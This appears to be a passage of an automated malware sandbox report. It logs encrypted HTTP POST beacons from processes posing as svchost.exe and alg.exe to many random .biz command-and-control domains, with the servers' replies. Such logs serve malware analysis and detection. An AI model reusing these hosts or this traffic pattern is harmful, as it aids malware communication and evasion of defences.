                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              54192.168.2.44991954.244.188.177804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.289952993 CEST352OUTPOST /ouftojym HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: lrxdmhrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.290518999 CEST786OUTData Raw: d1 5a 07 97 d2 4e 80 6b 06 03 00 00 d3 19 fb 19 4a 44 9e da 90 6c 64 9b 3f 9b 5c b5 f9 df d4 db 40 57 60 4d b6 1e 00 01 37 cf 9a ec 96 06 7b f6 e9 bf e7 e8 a9 b6 0f c4 5b a2 f8 b0 a0 4e ec f0 b7 fd f5 b6 20 e1 6a 1e e8 ff 37 95 1e 95 5a 99 7c 10
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ZNkJDld?\@W`M7{[N j7Z|Yfck/uKkt?>0(/%v^P>X9ue&$G@m'OcGVz0b{8|/fjLK8$"R|x,4kh^<>ZW.D\vQ<v{X.nW
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.010620117 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:55 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=6cf379045d64201f377e89d364100c00|8.46.123.33|1728394135|1728394135|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              55192.168.2.44992035.164.78.200802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.317620993 CEST349OUTPOST /kaxtgyu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: nqwjmb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.317643881 CEST778OUTData Raw: d5 c9 f2 14 cc 80 40 1a fe 02 00 00 82 f4 51 aa b9 da 61 2b 6a 61 6c 6e 49 35 90 86 53 2a 76 4f ed 37 c1 47 8d b6 f3 77 41 03 1d 8c 74 ec 8c a8 a1 df d3 55 be 15 ed 78 ab 16 67 b7 07 24 10 06 f4 8c 9f a6 3d ea 2b 3e 31 97 4b 87 ef c5 69 77 d3 8a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: @Qa+jalnI5S*vO7GwAtUxg$=+>1Kiw8'<F#Aa-2wBd_TT I+`n*Ux$eLLZYQG 's1{ybGZ-3~\0zK3EK .A}*Ak*2.Vf
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.052648067 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:55 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=788d7726e8f21456a993a9576fca4f16|8.46.123.33|1728394135|1728394135|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              56192.168.2.44992618.141.10.107804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.094455004 CEST344OUTPOST /h HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: wllvnzb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.094480038 CEST786OUTData Raw: 0a 00 23 15 d9 b1 ec 63 06 03 00 00 04 9c 41 a9 ca b3 71 99 2f 4a 01 ac f9 db ea 76 60 f7 86 85 0d 58 88 cd a7 25 3f 56 6d d1 45 a1 db e6 46 3f 73 c8 39 1a 5a a4 7e f6 8d d8 ea 33 7c fa c4 56 cc e0 04 9e cb 63 92 80 dc d1 00 8e b5 90 44 9f 05 f3
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: #cAq/Jv`X%?VmEF?s9Z~3|VcD}4b9X<Ve`y.7[|&INi"zdH,.RXz5j=~D]Vi0D"g[gH<T']A\n>){f(1AqbX"a


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              57192.168.2.4499293.94.10.34802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.315296888 CEST356OUTPOST /dpntwbnivmh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: ytctnunms.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.315315962 CEST778OUTData Raw: e2 27 3b 44 8a 04 64 ca fe 02 00 00 a2 25 f8 af 98 b9 95 5f 4c 8f 69 39 56 49 38 06 e9 f8 56 07 32 4b 54 c6 21 5e 6e 9e fb ec 93 5b cf 2f 46 bb cd aa de 85 3d 71 a9 4d 64 98 49 ea 74 50 2a fa c1 94 57 9e ef d9 db bb df ea 00 41 c0 1b b1 d4 7e e9
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ';Dd%_Li9VI8V2KT!^n[/F=qMdItP*WA~4>{/os&:kDSl-,{?`0"5o*FJSL()ae3O1ZmV:z@>v8FX8wsEH)RFZT+
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.791634083 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=3125fd71c9ba5697c245a87867d01913|8.46.123.33|1728394136|1728394136|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              58192.168.2.44993018.141.10.107804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.441497087 CEST359OUTPOST /mshoclxftgdlbsbo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: wllvnzb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.441510916 CEST786OUTData Raw: df 7a 45 80 ab 8a fd e2 06 03 00 00 a2 ef 50 19 21 0e 9b 22 fe ff b7 f6 c8 66 94 52 3e fc a1 f6 7d 69 fe 68 ea 08 d4 b2 ec ea e0 95 92 24 f0 7e be 6a 40 b6 76 43 46 0a fd 46 32 a4 15 c6 f3 58 3b cf 55 7f de 50 8d 55 01 99 33 e7 4a c7 f7 0d 6d 99
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: zEP!"fR>}ih$~j@vCFF2X;UPU3JmGn4_o70)F`i`\YoH?^5NSRoX]CX6WVzj8?PRVIdpO\9Sv?*X$_+KGwd.11
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:57.773281097 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:57 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=aaf1e0fc16dc15ae7f728d94f1d93a6a|8.46.123.33|1728394137|1728394137|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              59192.168.2.449937165.160.15.20802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:57.108974934 CEST349OUTPOST /cxtsujgx HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:57.109078884 CEST778OUTData Raw: 58 5e c9 00 26 c3 74 b6 fe 02 00 00 0f eb 2c 05 6c 4a 4d de 7f 87 ed 65 8e 86 b3 5b 71 ce 63 e2 04 af 4e c5 57 69 5a 00 85 ca 08 45 79 82 db ef c2 ee 04 ef 67 cc 18 d4 90 e7 71 11 86 02 9b 29 3f a9 31 ef 6e 14 15 21 00 ee e7 7a f8 cd d6 b4 71 78
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: X^&t,lJMe[qcNWiZEygq)?1n!zqxk+LR8r";sZc2Jcb4p-b}|z9 H$0MTZTdkQch)L,GH,#_J
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:57.817976952 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:57 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:57.879245043 CEST352OUTPOST /lihflvfpneg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:57.879275084 CEST778OUTData Raw: 1a a1 f4 f3 ff ef 55 31 fe 02 00 00 f6 f1 6f fe 8b 90 80 8e 40 60 46 40 99 20 90 57 3a 86 cb 58 c2 6d f3 64 fe d2 dc b1 dc a3 9a bb 41 f0 d1 08 ed 44 21 ba 27 1c a4 bf 71 c0 61 21 d0 77 2d f9 23 18 97 a7 e4 34 d3 ff c1 63 c5 8d 0f 22 da 2b 72 f7
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: U1o@`F@ W:XmdAD!'qa!w-#4c"+ruOM0z#''9EB']Y"):$ew1HG-9T)INTV}Kq3Q~FA}&D4-q{fur:YV@x9nsU%."=t!X
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.107155085 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              60192.168.2.44994318.208.156.248804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:57.866677046 CEST347OUTPOST /ryysvg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: gnqgo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:57.866677046 CEST786OUTData Raw: eb 6a 78 1e 6d b1 80 b1 06 03 00 00 54 e1 e6 e5 2d 14 3d 89 6c 76 f7 64 77 e0 f8 0f c6 8c 9e dd d5 3c 38 36 bf a3 56 3a e7 a9 39 19 a1 ab 25 51 d7 9a fb ed fe 09 66 d4 f2 d0 43 9f d0 ec 91 f4 7d c1 2f 4c c8 d6 7d b8 6f 56 c6 f6 42 34 f4 e6 b9 df
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: jxmT-=lvdw<86V:9%QfC}/L}oVB4\L4pLe&:jyL.8e]LXDj}@Pw)mIIV0J5Kl?[KwXX?2S?UL`Iz${kc l^4dS$z:l
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.321844101 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=8bba6b8341cd27318ad3446838954608|8.46.123.33|1728394138|1728394138|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              61192.168.2.44994554.244.188.177802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.253988981 CEST357OUTPOST /ihixrfcnmctn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: oshhkdluh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.254019022 CEST778OUTData Raw: 76 30 1f b0 d2 19 b0 54 fe 02 00 00 b1 45 f9 3c 09 7b 06 35 dc e1 eb 55 98 d6 54 fe 2e 43 16 ca 1c 36 e5 53 25 51 ce e9 39 d7 55 da 73 ac 87 c6 35 4e 92 0b 46 4d 08 78 0b cc 4e ea 0f 5a 26 14 56 ad 3a b1 1a 75 21 23 4d 72 9d 3a 5d fe 8d 69 cb 85
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: v0TE<{5UT.C6S%Q9Us5NFMxNZ&V:u!#Mr:]iK$8qM*8G~%.l>X,h<W^L>ap@Rnw54'k0<f+<_!}Nsm:h-3} uFjWC
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.973433018 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=02b074bea0a401d6fff2cffee3baf96c|8.46.123.33|1728394138|1728394138|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              62192.168.2.44994744.221.84.105804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.399272919 CEST360OUTPOST /bsskdfvqijpyfnid HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: jhvzpcfg.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.399286985 CEST786OUTData Raw: 04 ee 1e b1 bf b2 36 82 06 03 00 00 50 68 27 ea f6 6c ea 48 5e ab 7e 34 67 38 4c 9a 70 ee 0d 8d 83 85 b3 74 9e e8 b5 fa 88 e0 f0 31 60 fb 43 77 33 cc a7 0d 55 33 19 78 56 71 c9 3a 40 70 2a 1b aa 8e c5 3f 70 37 8d b1 07 25 8d b8 eb be 2f a5 9f 18
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 6Ph'lH^~4g8Lpt1`Cw3U3xVq:@p*?p7%/]{ZRNb ss*T/Ln7@< g^P(O?\Jad&r4)8^vkO5.*4h[Y~/#Z1cQOZFmxnS
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.877732038 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=ff2e52c734806c009a481621c5178ea0|8.46.123.33|1728394138|1728394138|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              63192.168.2.44995218.141.10.107804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.965022087 CEST354OUTPOST /dxsssktqcq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: acwjcqqv.biz
